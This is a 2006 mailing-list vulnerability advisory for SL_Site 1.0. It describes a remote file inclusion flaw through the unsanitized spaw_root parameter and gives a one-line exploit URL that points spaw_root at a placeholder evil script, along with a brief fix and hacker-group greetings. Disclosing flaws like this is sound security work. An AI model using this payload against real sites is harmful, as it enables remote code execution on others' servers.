SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

ciriboflacs Thu, 07 Sep 2006 15:36:35 -0700

---------------------------------------------------------------------------


SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

---------------------------------------------------------------------------



Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :

Remote : Yes

Critical Level : Dangerous

---------------------------------------------------------------------------


Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : SL_Site

version : 1.0

URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip

------------------------------------------------------------------



Exploit:

~~~~~~

Variable $spaw_root not sanitized.When register_globals=on an attacker ca

n exploit this vulnerability with a simple php injection script.


# 
http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]

---------------------------------------------------------------------------


Solution :

~~~~~~~~

declare variabel $spaw_root

---------------------------------------------------------------------------



Shoutz:

~~~~


# Special greetz to my good friend [Oo]

# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]

---------------------------------------------------------------------------


*/


Contact:

~~~~~~


Nick: Kw3rLn

E-mail: ciriboflacs[at]YaHoo[dot]Com

Homepage: hTTp://RST-CREW.NET

_/*


-------------------------------- [ EOF] ----------------------------------

SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability

Reply via email to